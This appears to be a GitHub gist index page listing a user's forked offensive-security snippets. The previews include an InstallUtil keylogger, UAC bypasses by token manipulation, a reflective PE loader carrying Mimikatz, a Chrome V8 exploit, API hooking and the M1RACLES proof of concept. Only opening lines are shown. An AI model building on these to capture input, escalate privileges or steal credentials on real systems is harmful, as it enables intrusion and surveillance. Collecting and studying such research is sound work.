aaaddress1
/ index.js
Last active
August 29, 2015 14:17
— forked from edokeh/index.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // _oo0oo_ | |
| // o8888888o | |
| // 88" . "88 | |
| // (| -_- |) | |
| // 0\ = /0 | |
| // ___/`---'\___ | |
| // .' \\| |// '. | |
| // / \\||| : |||// \ | |
| // / _||||| -:- |||||- \ |
aaaddress1
/ super_decoder.js
Created
October 10, 2016 12:13
— forked from Inndy/super_decoder.js
Decode jsfuck / aaencode / jjencode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| !function () { | |
| var global = this; | |
| var old_eval = global.eval; | |
| var old_const = global.Function.prototype.constructor; | |
| global.Function.prototype.constructor = function (code) { | |
| console.log('Function Constructor: ' + code); | |
| return old_const(code); | |
| }; | |
| global.eval = function (code) { | |
| console.log('EVIL: ' + code); |
aaaddress1
/ InstallUtilMouseKeyLogger.cs
Created
February 26, 2018 20:27
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
aaaddress1
/ Injectable.cpp
Created
May 31, 2018 07:23
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
aaaddress1
/ uacbypasstokenmanipulation.py
Created
January 30, 2020 17:39
— forked from dezhub/uacbypasstokenmanipulation.py
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
| # This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32' , use_last_error=True) |
aaaddress1
/ uacbypasstokenmanipulation.py
Created
January 30, 2020 17:39
— forked from dezhub/uacbypasstokenmanipulation.py
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
| # This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32' , use_last_error=True) |
aaaddress1
/ gist:a9f3fec5e382a6e471c45f191da36021
Created
January 30, 2020 17:39
— forked from hfiref0x/gist:59c689a14f1fc2302d858ae0aa3f6b86
CIA Stinger UAC bypass (likely)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
aaaddress1
/ PELoader.cs
Created
July 19, 2020 15:46
— forked from xorrior/PELoader.cs
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
aaaddress1
/ chrome-v8-issue-1126249.js
Created
March 22, 2021 03:38
— forked from hkraw/chrome-v8-issue-1126249.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.cvt_buf = new ArrayBuffer(8); | |
| this.cvt_f64a = new Float64Array(this.cvt_buf); | |
| this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
| this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
| } | |
| ftoi(f) { |
aaaddress1
/ m1racles-poc.c
Created
June 1, 2021 14:10
— forked from marcan/m1racles-poc.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |
OlderNewer